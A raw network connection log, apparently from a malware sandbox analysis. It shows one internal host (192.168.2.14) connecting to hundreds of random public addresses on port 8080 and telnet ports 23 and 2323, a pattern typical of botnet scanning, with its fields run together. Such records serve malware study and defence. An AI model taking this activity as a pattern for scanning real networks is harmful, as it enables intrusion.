                                                        Feb 14, 2024 09:32:45.803211927 CET407478080192.168.2.1462.27.170.221
                                                        Feb 14, 2024 09:32:45.803217888 CET407478080192.168.2.1485.140.34.187
                                                        Feb 14, 2024 09:32:45.803220987 CET407478080192.168.2.1494.140.87.74
                                                        Feb 14, 2024 09:32:45.803220987 CET407478080192.168.2.1431.238.200.90
                                                        Feb 14, 2024 09:32:45.803220987 CET407478080192.168.2.1495.93.27.75
                                                        Feb 14, 2024 09:32:45.803220987 CET407478080192.168.2.1495.6.188.242
                                                        Feb 14, 2024 09:32:45.803220987 CET407478080192.168.2.1431.68.184.109
                                                        Feb 14, 2024 09:32:45.803234100 CET407478080192.168.2.1495.148.104.195
                                                        Feb 14, 2024 09:32:45.803241014 CET407478080192.168.2.1431.122.253.114
                                                        Feb 14, 2024 09:32:45.803241014 CET407478080192.168.2.1485.227.186.81
                                                        Feb 14, 2024 09:32:45.803256035 CET407478080192.168.2.1494.227.122.171
                                                        Feb 14, 2024 09:32:45.803261042 CET407478080192.168.2.1485.136.118.20
                                                        Feb 14, 2024 09:32:45.803272963 CET407478080192.168.2.1462.237.181.218
                                                        Feb 14, 2024 09:32:45.803287029 CET407478080192.168.2.1494.117.44.131
                                                        Feb 14, 2024 09:32:45.803287029 CET407478080192.168.2.1495.136.90.45
                                                        Feb 14, 2024 09:32:45.803288937 CET407478080192.168.2.1485.86.97.166
                                                        Feb 14, 2024 09:32:45.803288937 CET407478080192.168.2.1494.180.192.104
                                                        Feb 14, 2024 09:32:45.803297043 CET407478080192.168.2.1494.8.171.97
                                                        Feb 14, 2024 09:32:45.803297043 CET407478080192.168.2.1462.109.21.200
                                                        Feb 14, 2024 09:32:45.803297043 CET407478080192.168.2.1494.52.192.68
                                                        Feb 14, 2024 09:32:45.803297997 CET407478080192.168.2.1462.101.171.191
                                                        Feb 14, 2024 09:32:45.803303003 CET407478080192.168.2.1485.227.56.173
                                                        Feb 14, 2024 09:32:45.803303957 CET407478080192.168.2.1431.229.185.242
                                                        Feb 14, 2024 09:32:45.803303957 CET407478080192.168.2.1495.86.198.252
                                                        Feb 14, 2024 09:32:45.803312063 CET407478080192.168.2.1462.67.45.167
                                                        Feb 14, 2024 09:32:45.803318024 CET407478080192.168.2.1494.63.37.47
                                                        Feb 14, 2024 09:32:45.803319931 CET407478080192.168.2.1494.248.249.249
                                                        Feb 14, 2024 09:32:45.803319931 CET407478080192.168.2.1462.220.42.225
                                                        Feb 14, 2024 09:32:45.803334951 CET407478080192.168.2.1431.187.43.226
                                                        Feb 14, 2024 09:32:45.803345919 CET407478080192.168.2.1462.227.192.75
                                                        Feb 14, 2024 09:32:45.803345919 CET407478080192.168.2.1431.64.87.147
                                                        Feb 14, 2024 09:32:45.803345919 CET407478080192.168.2.1485.221.69.110
                                                        Feb 14, 2024 09:32:45.803347111 CET407478080192.168.2.1431.1.53.31
                                                        Feb 14, 2024 09:32:45.803345919 CET407478080192.168.2.1462.8.75.221
                                                        Feb 14, 2024 09:32:45.803345919 CET407478080192.168.2.1495.52.145.29
                                                        Feb 14, 2024 09:32:45.803345919 CET407478080192.168.2.1431.187.19.181
                                                        Feb 14, 2024 09:32:45.803345919 CET407478080192.168.2.1431.11.211.204
                                                        Feb 14, 2024 09:32:45.803345919 CET407478080192.168.2.1494.137.4.155
                                                        Feb 14, 2024 09:32:45.803345919 CET407478080192.168.2.1495.26.100.80
                                                        Feb 14, 2024 09:32:45.803345919 CET407478080192.168.2.1485.46.159.135
                                                        Feb 14, 2024 09:32:45.803358078 CET407478080192.168.2.1431.160.135.253
                                                        Feb 14, 2024 09:32:45.803402901 CET407478080192.168.2.1431.176.217.157
                                                        Feb 14, 2024 09:32:45.803402901 CET407478080192.168.2.1431.77.225.20
                                                        Feb 14, 2024 09:32:45.803404093 CET407478080192.168.2.1431.87.7.30
                                                        Feb 14, 2024 09:32:45.803405046 CET407478080192.168.2.1485.91.10.46
                                                        Feb 14, 2024 09:32:45.803405046 CET407478080192.168.2.1431.107.2.233
                                                        Feb 14, 2024 09:32:45.803404093 CET407478080192.168.2.1494.245.13.64
                                                        Feb 14, 2024 09:32:45.803406000 CET407478080192.168.2.1494.51.237.161
                                                        Feb 14, 2024 09:32:45.803404093 CET407478080192.168.2.1462.170.233.148
                                                        Feb 14, 2024 09:32:45.803406000 CET407478080192.168.2.1494.89.213.58
                                                        Feb 14, 2024 09:32:45.803406000 CET407478080192.168.2.1495.211.63.166
                                                        Feb 14, 2024 09:32:45.803406954 CET407478080192.168.2.1494.189.171.221
                                                        Feb 14, 2024 09:32:45.803406000 CET407478080192.168.2.1494.189.237.156
                                                        Feb 14, 2024 09:32:45.803422928 CET407478080192.168.2.1462.21.84.76
                                                        Feb 14, 2024 09:32:45.803426981 CET407478080192.168.2.1494.236.177.180
                                                        Feb 14, 2024 09:32:45.803426981 CET407478080192.168.2.1495.67.221.163
                                                        Feb 14, 2024 09:32:45.803427935 CET407478080192.168.2.1495.171.135.137
                                                        Feb 14, 2024 09:32:45.803427935 CET407478080192.168.2.1494.102.255.227
                                                        Feb 14, 2024 09:32:45.803427935 CET407478080192.168.2.1462.236.3.199
                                                        Feb 14, 2024 09:32:45.803427935 CET407478080192.168.2.1462.216.243.153
                                                        Feb 14, 2024 09:32:45.803452969 CET407478080192.168.2.1485.57.171.68
                                                        Feb 14, 2024 09:32:45.803452969 CET407478080192.168.2.1494.134.43.193
                                                        Feb 14, 2024 09:32:45.803452969 CET407478080192.168.2.1485.186.109.92
                                                        Feb 14, 2024 09:32:45.803456068 CET407478080192.168.2.1495.21.200.111
                                                        Feb 14, 2024 09:32:45.803456068 CET407478080192.168.2.1431.77.163.219
                                                        Feb 14, 2024 09:32:45.803458929 CET407478080192.168.2.1485.5.2.195
                                                        Feb 14, 2024 09:32:45.803458929 CET407478080192.168.2.1431.220.12.154
                                                        Feb 14, 2024 09:32:45.803461075 CET407478080192.168.2.1494.194.60.225
                                                        Feb 14, 2024 09:32:45.803467989 CET407478080192.168.2.1462.79.38.237
                                                        Feb 14, 2024 09:32:45.803467989 CET407478080192.168.2.1485.255.190.233
                                                        Feb 14, 2024 09:32:45.803467989 CET407478080192.168.2.1462.110.105.127
                                                        Feb 14, 2024 09:32:45.803467989 CET407478080192.168.2.1431.2.98.121
                                                        Feb 14, 2024 09:32:45.803467989 CET407478080192.168.2.1485.199.141.104
                                                        Feb 14, 2024 09:32:45.803467989 CET407478080192.168.2.1495.61.168.161
                                                        Feb 14, 2024 09:32:45.803468943 CET407478080192.168.2.1431.209.82.131
                                                        Feb 14, 2024 09:32:45.803468943 CET407478080192.168.2.1462.218.105.60
                                                        Feb 14, 2024 09:32:45.803570032 CET407478080192.168.2.1431.213.80.60
                                                        Feb 14, 2024 09:32:45.803570986 CET407478080192.168.2.1462.22.145.117
                                                        Feb 14, 2024 09:32:45.803570986 CET407478080192.168.2.1462.71.9.232
                                                        Feb 14, 2024 09:32:45.803570986 CET407478080192.168.2.1494.103.131.95
                                                        Feb 14, 2024 09:32:45.803570986 CET407478080192.168.2.1462.220.174.88
                                                        Feb 14, 2024 09:32:45.803570986 CET407478080192.168.2.1431.97.26.50
                                                        Feb 14, 2024 09:32:45.803570986 CET407478080192.168.2.1462.31.53.23
                                                        Feb 14, 2024 09:32:45.803570986 CET407478080192.168.2.1494.38.5.18
                                                        Feb 14, 2024 09:32:45.803654909 CET407478080192.168.2.1495.124.66.185
                                                        Feb 14, 2024 09:32:45.803656101 CET407478080192.168.2.1431.208.38.252
                                                        Feb 14, 2024 09:32:45.803656101 CET407478080192.168.2.1431.114.193.179
                                                        Feb 14, 2024 09:32:45.803656101 CET407478080192.168.2.1485.80.64.230
                                                        Feb 14, 2024 09:32:45.803656101 CET407478080192.168.2.1462.36.193.182
                                                        Feb 14, 2024 09:32:45.803656101 CET407478080192.168.2.1494.238.86.212
                                                        Feb 14, 2024 09:32:45.803656101 CET407478080192.168.2.1485.196.130.196
                                                        Feb 14, 2024 09:32:45.803656101 CET407478080192.168.2.1431.199.147.143
                                                        Feb 14, 2024 09:32:45.803731918 CET407478080192.168.2.1462.230.162.106
                                                        Feb 14, 2024 09:32:45.803731918 CET407478080192.168.2.1431.176.139.184
                                                        Feb 14, 2024 09:32:45.803731918 CET407478080192.168.2.1485.166.58.201
                                                        Feb 14, 2024 09:32:45.803731918 CET407478080192.168.2.1485.35.119.149
                                                        Feb 14, 2024 09:32:45.803731918 CET407478080192.168.2.1494.173.71.86
                                                        Feb 14, 2024 09:32:45.803731918 CET407478080192.168.2.1431.215.107.82
                                                        Feb 14, 2024 09:32:45.803733110 CET407478080192.168.2.1485.132.74.196
                                                        Feb 14, 2024 09:32:45.803733110 CET407478080192.168.2.1494.205.42.169
                                                        Feb 14, 2024 09:32:45.803818941 CET407478080192.168.2.1462.53.85.140
                                                        Feb 14, 2024 09:32:45.803818941 CET407478080192.168.2.1494.34.39.232
                                                        Feb 14, 2024 09:32:45.803818941 CET407478080192.168.2.1494.4.137.219
                                                        Feb 14, 2024 09:32:45.803818941 CET407478080192.168.2.1462.209.7.196
                                                        Feb 14, 2024 09:32:45.803819895 CET407478080192.168.2.1494.186.194.89
                                                        Feb 14, 2024 09:32:45.803819895 CET407478080192.168.2.1485.227.20.176
                                                        Feb 14, 2024 09:32:45.803819895 CET407478080192.168.2.1495.180.156.81
                                                        Feb 14, 2024 09:32:45.803819895 CET407478080192.168.2.1462.134.175.156
                                                        Feb 14, 2024 09:32:45.803905964 CET407478080192.168.2.1462.182.53.20
                                                        Feb 14, 2024 09:32:45.803905964 CET407478080192.168.2.1431.143.203.96
                                                        Feb 14, 2024 09:32:45.803906918 CET407478080192.168.2.1462.169.175.74
                                                        Feb 14, 2024 09:32:45.803906918 CET407478080192.168.2.1495.243.59.50
                                                        Feb 14, 2024 09:32:45.803906918 CET407478080192.168.2.1485.191.199.239
                                                        Feb 14, 2024 09:32:45.803906918 CET407478080192.168.2.1431.161.43.68
                                                        Feb 14, 2024 09:32:45.803906918 CET407478080192.168.2.1494.152.67.14
                                                        Feb 14, 2024 09:32:45.803906918 CET407478080192.168.2.1485.81.181.10
                                                        Feb 14, 2024 09:32:45.803987980 CET407478080192.168.2.1462.15.159.80
                                                        Feb 14, 2024 09:32:45.803987980 CET407478080192.168.2.1431.77.200.68
                                                        Feb 14, 2024 09:32:45.803987980 CET407478080192.168.2.1495.187.65.201
                                                        Feb 14, 2024 09:32:45.803987980 CET407478080192.168.2.1495.191.36.232
                                                        Feb 14, 2024 09:32:45.803987980 CET407478080192.168.2.1431.116.161.189
                                                        Feb 14, 2024 09:32:45.807190895 CET3332323192.168.2.1487.146.78.31
                                                        Feb 14, 2024 09:32:45.807207108 CET3332323192.168.2.1442.33.224.174
                                                        Feb 14, 2024 09:32:45.807238102 CET3332323192.168.2.14144.237.70.56
                                                        Feb 14, 2024 09:32:45.807250977 CET3332323192.168.2.14140.19.215.236
                                                        Feb 14, 2024 09:32:45.807257891 CET333232323192.168.2.1471.161.141.49
                                                        Feb 14, 2024 09:32:45.807257891 CET3332323192.168.2.1438.251.206.187
                                                        Feb 14, 2024 09:32:45.807257891 CET3332323192.168.2.1427.36.10.42
                                                        Feb 14, 2024 09:32:45.807262897 CET3332323192.168.2.14143.123.196.214
                                                        Feb 14, 2024 09:32:45.807296038 CET3332323192.168.2.14144.246.156.167
                                                        Feb 14, 2024 09:32:45.807303905 CET3332323192.168.2.14157.200.72.107
                                                        Feb 14, 2024 09:32:45.807310104 CET333232323192.168.2.1424.161.67.246
                                                        Feb 14, 2024 09:32:45.807337999 CET3332323192.168.2.14108.48.72.46
                                                        Feb 14, 2024 09:32:45.807370901 CET3332323192.168.2.14163.155.9.49
                                                        Feb 14, 2024 09:32:45.807370901 CET3332323192.168.2.1488.99.214.65
                                                        Feb 14, 2024 09:32:45.807373047 CET3332323192.168.2.14212.132.122.18
                                                        Feb 14, 2024 09:32:45.807373047 CET3332323192.168.2.14165.84.129.215
                                                        Feb 14, 2024 09:32:45.807383060 CET3332323192.168.2.14134.174.4.138
                                                        Feb 14, 2024 09:32:45.807383060 CET333232323192.168.2.14205.34.23.0
                                                        Feb 14, 2024 09:32:45.807391882 CET3332323192.168.2.14109.145.138.14
                                                        Feb 14, 2024 09:32:45.807395935 CET3332323192.168.2.14117.180.176.245
                                                        Feb 14, 2024 09:32:45.807395935 CET3332323192.168.2.1452.143.77.78
                                                        Feb 14, 2024 09:32:45.807410002 CET3332323192.168.2.1453.70.193.29
                                                        Feb 14, 2024 09:32:45.807410955 CET3332323192.168.2.1431.217.147.38
                                                        Feb 14, 2024 09:32:45.807410955 CET3332323192.168.2.14207.191.201.224
                                                        Feb 14, 2024 09:32:45.807410955 CET3332323192.168.2.1474.54.172.102
                                                        Feb 14, 2024 09:32:45.807410955 CET333232323192.168.2.14132.184.196.222
                                                        Feb 14, 2024 09:32:45.807410955 CET3332323192.168.2.14100.151.167.213
                                                        Feb 14, 2024 09:32:45.807410955 CET3332323192.168.2.14174.193.35.41
                                                        Feb 14, 2024 09:32:45.807410955 CET3332323192.168.2.14160.141.83.24
                                                        Feb 14, 2024 09:32:45.807413101 CET3332323192.168.2.14220.87.211.214
                                                        Feb 14, 2024 09:32:45.807410955 CET3332323192.168.2.14131.248.58.11
                                                        Feb 14, 2024 09:32:45.807413101 CET3332323192.168.2.14191.0.190.58
                                                        Feb 14, 2024 09:32:45.807430029 CET3332323192.168.2.1418.214.204.174
                                                        Feb 14, 2024 09:32:45.807430983 CET3332323192.168.2.14222.131.48.129
                                                        Feb 14, 2024 09:32:45.807430983 CET3332323192.168.2.1432.49.18.156
                                                        Feb 14, 2024 09:32:45.807430983 CET3332323192.168.2.1442.124.57.104
                                                        Feb 14, 2024 09:32:45.807430983 CET3332323192.168.2.14143.43.70.10
                                                        Feb 14, 2024 09:32:45.807440042 CET3332323192.168.2.14103.221.153.157
                                                        Feb 14, 2024 09:32:45.807440996 CET3332323192.168.2.1487.171.232.96
                                                        Feb 14, 2024 09:32:45.807440996 CET3332323192.168.2.14200.44.110.84
                                                        Feb 14, 2024 09:32:45.807440996 CET3332323192.168.2.141.47.17.81
                                                        Feb 14, 2024 09:32:45.807440996 CET333232323192.168.2.14170.222.202.45
                                                        Feb 14, 2024 09:32:45.807440996 CET3332323192.168.2.14136.218.57.248
                                                        Feb 14, 2024 09:32:45.807446957 CET3332323192.168.2.1425.71.90.236
                                                        Feb 14, 2024 09:32:45.807447910 CET3332323192.168.2.14112.31.220.60
                                                        Feb 14, 2024 09:32:45.807447910 CET3332323192.168.2.14162.117.118.131
                                                        Feb 14, 2024 09:32:45.807447910 CET3332323192.168.2.14149.38.78.0
                                                        Feb 14, 2024 09:32:45.807450056 CET3332323192.168.2.1493.255.184.118
                                                        Feb 14, 2024 09:32:45.807450056 CET3332323192.168.2.1489.179.166.105
                                                        Feb 14, 2024 09:32:45.807450056 CET3332323192.168.2.14200.13.121.202
                                                        Feb 14, 2024 09:32:45.807450056 CET3332323192.168.2.14205.50.16.195
                                                        Feb 14, 2024 09:32:45.807450056 CET3332323192.168.2.1478.177.105.198
                                                        Feb 14, 2024 09:32:45.807451010 CET3332323192.168.2.14177.60.194.201
                                                        Feb 14, 2024 09:32:45.807450056 CET3332323192.168.2.1465.184.128.208
                                                        Feb 14, 2024 09:32:45.807450056 CET3332323192.168.2.1475.253.197.232
                                                        Feb 14, 2024 09:32:45.807465076 CET333232323192.168.2.14195.240.254.103
                                                        Feb 14, 2024 09:32:45.807466984 CET333232323192.168.2.141.156.81.165
                                                        Feb 14, 2024 09:32:45.807468891 CET3332323192.168.2.14159.137.86.198
                                                        Feb 14, 2024 09:32:45.807487965 CET3332323192.168.2.1420.212.19.13
                                                        Feb 14, 2024 09:32:45.807487965 CET3332323192.168.2.14168.35.26.197
                                                        Feb 14, 2024 09:32:45.807487965 CET3332323192.168.2.14178.176.117.180
                                                        Feb 14, 2024 09:32:45.807492971 CET3332323192.168.2.14150.220.54.133
                                                        Feb 14, 2024 09:32:45.807495117 CET3332323192.168.2.14168.183.109.55
                                                        Feb 14, 2024 09:32:45.807495117 CET3332323192.168.2.1470.21.145.119
                                                        Feb 14, 2024 09:32:45.807497025 CET3332323192.168.2.1477.89.206.32
                                                        Feb 14, 2024 09:32:45.807513952 CET333232323192.168.2.14177.189.141.122
                                                        Feb 14, 2024 09:32:45.807524920 CET3332323192.168.2.1451.32.210.247
                                                        Feb 14, 2024 09:32:45.807524920 CET3332323192.168.2.1461.201.49.162
                                                        Feb 14, 2024 09:32:45.807538033 CET3332323192.168.2.14189.236.111.111
                                                        Feb 14, 2024 09:32:45.807540894 CET3332323192.168.2.14182.222.126.110
                                                        Feb 14, 2024 09:32:45.807547092 CET3332323192.168.2.1480.236.150.52
                                                        Feb 14, 2024 09:32:45.807549000 CET3332323192.168.2.14176.177.228.255
                                                        Feb 14, 2024 09:32:45.807547092 CET3332323192.168.2.14141.198.71.50
                                                        Feb 14, 2024 09:32:45.807549000 CET3332323192.168.2.1465.136.191.224
                                                        Feb 14, 2024 09:32:45.807547092 CET3332323192.168.2.1498.220.25.221
                                                        Feb 14, 2024 09:32:45.807547092 CET3332323192.168.2.14130.1.245.124
                                                        Feb 14, 2024 09:32:45.807547092 CET3332323192.168.2.14133.59.110.32
                                                        Feb 14, 2024 09:32:45.807563066 CET3332323192.168.2.14135.34.99.96
                                                        Feb 14, 2024 09:32:45.807573080 CET3332323192.168.2.14117.169.16.60
                                                        Feb 14, 2024 09:32:45.807579994 CET3332323192.168.2.14176.99.133.112
                                                        Feb 14, 2024 09:32:45.807586908 CET333232323192.168.2.14100.21.224.91
                                                        Feb 14, 2024 09:32:45.807594061 CET3332323192.168.2.14186.232.216.26
                                                        Feb 14, 2024 09:32:45.807594061 CET3332323192.168.2.1464.22.30.197
                                                        Feb 14, 2024 09:32:45.807598114 CET3332323192.168.2.14219.27.38.249
                                                        Feb 14, 2024 09:32:45.807615042 CET3332323192.168.2.14217.211.254.148
                                                        Feb 14, 2024 09:32:45.807616949 CET3332323192.168.2.14112.119.100.189
                                                        Feb 14, 2024 09:32:45.807635069 CET3332323192.168.2.1452.238.185.155
                                                        Feb 14, 2024 09:32:45.807637930 CET3332323192.168.2.14163.107.230.234
                                                        Feb 14, 2024 09:32:45.807641029 CET3332323192.168.2.14125.8.224.214
                                                        Feb 14, 2024 09:32:45.807646036 CET3332323192.168.2.14132.155.218.144
                                                        Feb 14, 2024 09:32:45.807651043 CET333232323192.168.2.14110.164.237.84
                                                        Feb 14, 2024 09:32:45.807657003 CET3332323192.168.2.14193.155.232.155
                                                        Feb 14, 2024 09:32:45.807671070 CET3332323192.168.2.1489.17.251.184
                                                        Feb 14, 2024 09:32:45.807672024 CET3332323192.168.2.14115.64.165.57
                                                        Feb 14, 2024 09:32:45.807673931 CET3332323192.168.2.1459.27.163.196
                                                        Feb 14, 2024 09:32:45.807684898 CET3332323192.168.2.14174.211.147.171
                                                        Feb 14, 2024 09:32:45.807689905 CET3332323192.168.2.14201.37.246.66
                                                        Feb 14, 2024 09:32:45.807697058 CET3332323192.168.2.141.145.133.175
                                                        Feb 14, 2024 09:32:45.807708979 CET3332323192.168.2.14158.229.44.23
                                                        Feb 14, 2024 09:32:45.807723045 CET333232323192.168.2.14165.191.193.81
                                                        Feb 14, 2024 09:32:45.807727098 CET3332323192.168.2.1462.62.96.166
                                                        Feb 14, 2024 09:32:45.807729959 CET3332323192.168.2.14223.79.13.255
                                                        Feb 14, 2024 09:32:45.807746887 CET3332323192.168.2.14188.181.12.138
                                                        Feb 14, 2024 09:32:45.807749987 CET3332323192.168.2.14208.142.14.82
                                                        Feb 14, 2024 09:32:45.807761908 CET3332323192.168.2.14140.227.26.234
                                                        Feb 14, 2024 09:32:45.807768106 CET3332323192.168.2.1447.152.119.88
                                                        Feb 14, 2024 09:32:45.807773113 CET3332323192.168.2.14157.74.34.153
                                                        Feb 14, 2024 09:32:45.807787895 CET3332323192.168.2.14162.190.123.178
                                                        Feb 14, 2024 09:32:45.807787895 CET3332323192.168.2.1462.33.201.32
                                                        Feb 14, 2024 09:32:45.807791948 CET3332323192.168.2.149.130.30.22
                                                        Feb 14, 2024 09:32:45.807801008 CET333232323192.168.2.14142.104.79.200
                                                        Feb 14, 2024 09:32:45.807810068 CET3332323192.168.2.1466.57.91.153
                                                        Feb 14, 2024 09:32:45.807816982 CET3332323192.168.2.14191.202.237.120
                                                        Feb 14, 2024 09:32:45.807828903 CET3332323192.168.2.1440.37.30.61
                                                        Feb 14, 2024 09:32:45.807828903 CET3332323192.168.2.14104.192.103.118
                                                        Feb 14, 2024 09:32:45.807830095 CET3332323192.168.2.14199.231.239.241
                                                        Feb 14, 2024 09:32:45.807846069 CET3332323192.168.2.1413.83.212.20
                                                        Feb 14, 2024 09:32:45.807857037 CET3332323192.168.2.1442.106.117.98
                                                        Feb 14, 2024 09:32:45.807861090 CET3332323192.168.2.1496.198.210.116
                                                        Feb 14, 2024 09:32:45.807872057 CET3332323192.168.2.14191.88.59.220
                                                        Feb 14, 2024 09:32:45.807872057 CET333232323192.168.2.14103.169.102.36
                                                        Feb 14, 2024 09:32:45.807872057 CET3332323192.168.2.14194.25.238.153
                                                        Feb 14, 2024 09:32:45.807878017 CET3332323192.168.2.14130.50.51.117
                                                        Feb 14, 2024 09:32:45.807878017 CET3332323192.168.2.14105.5.96.177
                                                        Feb 14, 2024 09:32:45.807885885 CET3332323192.168.2.14155.178.174.84
                                                        Feb 14, 2024 09:32:45.807904005 CET3332323192.168.2.1488.139.213.52
                                                        Feb 14, 2024 09:32:45.807904959 CET3332323192.168.2.1478.148.43.85
                                                        Feb 14, 2024 09:32:45.807904959 CET3332323192.168.2.14208.183.68.3
                                                        Feb 14, 2024 09:32:45.807908058 CET3332323192.168.2.14122.201.67.215
                                                        Feb 14, 2024 09:32:45.807913065 CET3332323192.168.2.1417.226.144.183
                                                        Feb 14, 2024 09:32:45.807920933 CET3332323192.168.2.1437.78.239.249
                                                        Feb 14, 2024 09:32:45.807924986 CET333232323192.168.2.1434.126.205.142
                                                        Feb 14, 2024 09:32:45.807936907 CET3332323192.168.2.1425.106.152.154
                                                        Feb 14, 2024 09:32:45.807938099 CET3332323192.168.2.1431.76.134.75
                                                        Feb 14, 2024 09:32:45.807945013 CET3332323192.168.2.1423.11.157.100
                                                        Feb 14, 2024 09:32:45.807959080 CET3332323192.168.2.14154.127.230.8
                                                        Feb 14, 2024 09:32:45.807959080 CET3332323192.168.2.14101.153.20.98
                                                        Feb 14, 2024 09:32:45.807965994 CET3332323192.168.2.14213.175.161.45
                                                        Feb 14, 2024 09:32:45.807981014 CET3332323192.168.2.1496.246.190.212
                                                        Feb 14, 2024 09:32:45.807984114 CET333232323192.168.2.1451.146.210.8
                                                        Feb 14, 2024 09:32:45.807985067 CET3332323192.168.2.14157.171.132.168
                                                        Feb 14, 2024 09:32:45.807990074 CET3332323192.168.2.14183.7.22.197
                                                        Feb 14, 2024 09:32:45.807990074 CET3332323192.168.2.14117.116.52.13
                                                        Feb 14, 2024 09:32:45.807996035 CET3332323192.168.2.14204.160.1.107
                                                        Feb 14, 2024 09:32:45.808008909 CET3332323192.168.2.1468.10.13.120
                                                        Feb 14, 2024 09:32:45.808015108 CET3332323192.168.2.1467.149.39.49
                                                        Feb 14, 2024 09:32:45.808016062 CET3332323192.168.2.14150.0.241.85
                                                        Feb 14, 2024 09:32:45.808023930 CET3332323192.168.2.1435.239.151.61
                                                        Feb 14, 2024 09:32:45.808026075 CET3332323192.168.2.14147.237.93.86
                                                        Feb 14, 2024 09:32:45.808032036 CET3332323192.168.2.14129.51.67.221
                                                        Feb 14, 2024 09:32:45.808036089 CET3332323192.168.2.14141.246.106.38
                                                        Feb 14, 2024 09:32:45.808036089 CET3332323192.168.2.14195.44.230.91
                                                        Feb 14, 2024 09:32:45.808036089 CET333232323192.168.2.1476.182.243.196
                                                        Feb 14, 2024 09:32:45.808042049 CET3332323192.168.2.14177.190.125.226
                                                        Feb 14, 2024 09:32:45.808043003 CET3332323192.168.2.14155.154.192.127
                                                        Feb 14, 2024 09:32:45.808048010 CET3332323192.168.2.14126.188.247.116
                                                        Feb 14, 2024 09:32:45.808057070 CET3332323192.168.2.1490.206.105.111
                                                        Feb 14, 2024 09:32:45.808058023 CET3332323192.168.2.1454.32.83.93
                                                        Feb 14, 2024 09:32:45.808062077 CET3332323192.168.2.1441.102.162.187
                                                        Feb 14, 2024 09:32:45.808074951 CET333232323192.168.2.14146.242.147.38
                                                        Feb 14, 2024 09:32:45.808077097 CET3332323192.168.2.14151.118.63.41
                                                        Feb 14, 2024 09:32:45.808082104 CET3332323192.168.2.14220.109.45.226
                                                        Feb 14, 2024 09:32:45.808101892 CET3332323192.168.2.14125.253.42.182
                                                        Feb 14, 2024 09:32:45.808103085 CET3332323192.168.2.1488.50.206.202
                                                        Feb 14, 2024 09:32:45.808101892 CET3332323192.168.2.14123.146.29.232
                                                        Feb 14, 2024 09:32:45.808106899 CET3332323192.168.2.14156.43.57.55
                                                        Feb 14, 2024 09:32:45.808128119 CET3332323192.168.2.142.16.84.208
                                                        Feb 14, 2024 09:32:45.808128119 CET3332323192.168.2.144.54.204.86
                                                        Feb 14, 2024 09:32:45.808139086 CET3332323192.168.2.1448.156.85.123
                                                        Feb 14, 2024 09:32:45.808139086 CET3332323192.168.2.14113.195.225.4
                                                        Feb 14, 2024 09:32:45.808139086 CET333232323192.168.2.14150.8.231.36
                                                        Feb 14, 2024 09:32:45.808152914 CET3332323192.168.2.14103.184.161.202
                                                        Feb 14, 2024 09:32:45.808155060 CET3332323192.168.2.14176.251.160.131
                                                        Feb 14, 2024 09:32:45.808156967 CET3332323192.168.2.14111.88.10.175
                                                        Feb 14, 2024 09:32:45.808160067 CET3332323192.168.2.14221.195.236.36
                                                        Feb 14, 2024 09:32:45.808168888 CET3332323192.168.2.1436.122.248.181
                                                        Feb 14, 2024 09:32:45.808182955 CET3332323192.168.2.14101.78.219.249
                                                        Feb 14, 2024 09:32:45.808202028 CET3332323192.168.2.14192.145.43.234
                                                        Feb 14, 2024 09:32:45.808202028 CET333232323192.168.2.14154.61.56.155
                                                        Feb 14, 2024 09:32:45.808207989 CET3332323192.168.2.1445.149.246.240
                                                        Feb 14, 2024 09:32:45.808207989 CET3332323192.168.2.14153.227.183.103
                                                        Feb 14, 2024 09:32:45.808207989 CET3332323192.168.2.1420.220.233.151
                                                        Feb 14, 2024 09:32:45.808223009 CET3332323192.168.2.1472.236.14.197
                                                        Feb 14, 2024 09:32:45.808233023 CET3332323192.168.2.1413.245.136.200
                                                        Feb 14, 2024 09:32:45.808245897 CET3332323192.168.2.14138.173.68.135
                                                        Feb 14, 2024 09:32:45.808248043 CET3332323192.168.2.1417.200.103.90
                                                        Feb 14, 2024 09:32:45.808257103 CET3332323192.168.2.1451.12.204.30
                                                        Feb 14, 2024 09:32:45.808257103 CET3332323192.168.2.1440.236.187.78
                                                        Feb 14, 2024 09:32:45.808274031 CET3332323192.168.2.1431.59.52.178
                                                        Feb 14, 2024 09:32:45.808276892 CET3332323192.168.2.14212.174.86.253
                                                        Feb 14, 2024 09:32:45.808276892 CET333232323192.168.2.1440.67.64.55
                                                        Feb 14, 2024 09:32:45.808276892 CET3332323192.168.2.14142.62.185.254
                                                        Feb 14, 2024 09:32:45.808279991 CET3332323192.168.2.1482.243.246.20
                                                        Feb 14, 2024 09:32:45.808295012 CET3332323192.168.2.14177.100.87.29
                                                        Feb 14, 2024 09:32:45.808303118 CET3332323192.168.2.14183.120.156.74
                                                        Feb 14, 2024 09:32:45.808307886 CET3332323192.168.2.14172.139.177.118
                                                        Feb 14, 2024 09:32:45.808309078 CET3332323192.168.2.1451.16.53.173
                                                        Feb 14, 2024 09:32:45.808317900 CET3332323192.168.2.14216.166.65.163
                                                        Feb 14, 2024 09:32:45.808331013 CET3332323192.168.2.1417.49.106.80
                                                        Feb 14, 2024 09:32:45.808343887 CET3332323192.168.2.14141.88.39.123
                                                        Feb 14, 2024 09:32:45.808348894 CET3332323192.168.2.14182.108.63.248
                                                        Feb 14, 2024 09:32:45.808351994 CET333232323192.168.2.1492.234.216.158
                                                        Feb 14, 2024 09:32:45.808352947 CET3332323192.168.2.14132.245.133.227
                                                        Feb 14, 2024 09:32:45.808363914 CET3332323192.168.2.1447.205.84.180
                                                        Feb 14, 2024 09:32:45.808377981 CET3332323192.168.2.14109.208.250.113
                                                        Feb 14, 2024 09:32:45.808387041 CET3332323192.168.2.14137.222.232.190
                                                        Feb 14, 2024 09:32:45.808387041 CET3332323192.168.2.14144.23.177.93
                                                        Feb 14, 2024 09:32:45.808402061 CET3332323192.168.2.1452.231.187.183
                                                        Feb 14, 2024 09:32:45.808408022 CET3332323192.168.2.1482.18.87.79
                                                        Feb 14, 2024 09:32:45.808410883 CET3332323192.168.2.1458.80.42.214
                                                        Feb 14, 2024 09:32:45.808410883 CET333232323192.168.2.1477.110.92.88
                                                        Feb 14, 2024 09:32:45.808425903 CET3332323192.168.2.1446.177.78.184
                                                        Feb 14, 2024 09:32:45.808425903 CET3332323192.168.2.14153.49.64.116
                                                        Feb 14, 2024 09:32:45.808435917 CET3332323192.168.2.14141.222.188.51
                                                        Feb 14, 2024 09:32:45.808443069 CET3332323192.168.2.14113.173.44.4
                                                        Feb 14, 2024 09:32:45.808448076 CET3332323192.168.2.14121.165.110.184
                                                        Feb 14, 2024 09:32:45.808449030 CET3332323192.168.2.14140.159.233.130
                                                        Feb 14, 2024 09:32:45.808455944 CET3332323192.168.2.14129.182.114.153
                                                        Feb 14, 2024 09:32:45.808461905 CET3332323192.168.2.1492.4.9.221
                                                        Feb 14, 2024 09:32:45.808476925 CET333232323192.168.2.14141.105.210.251
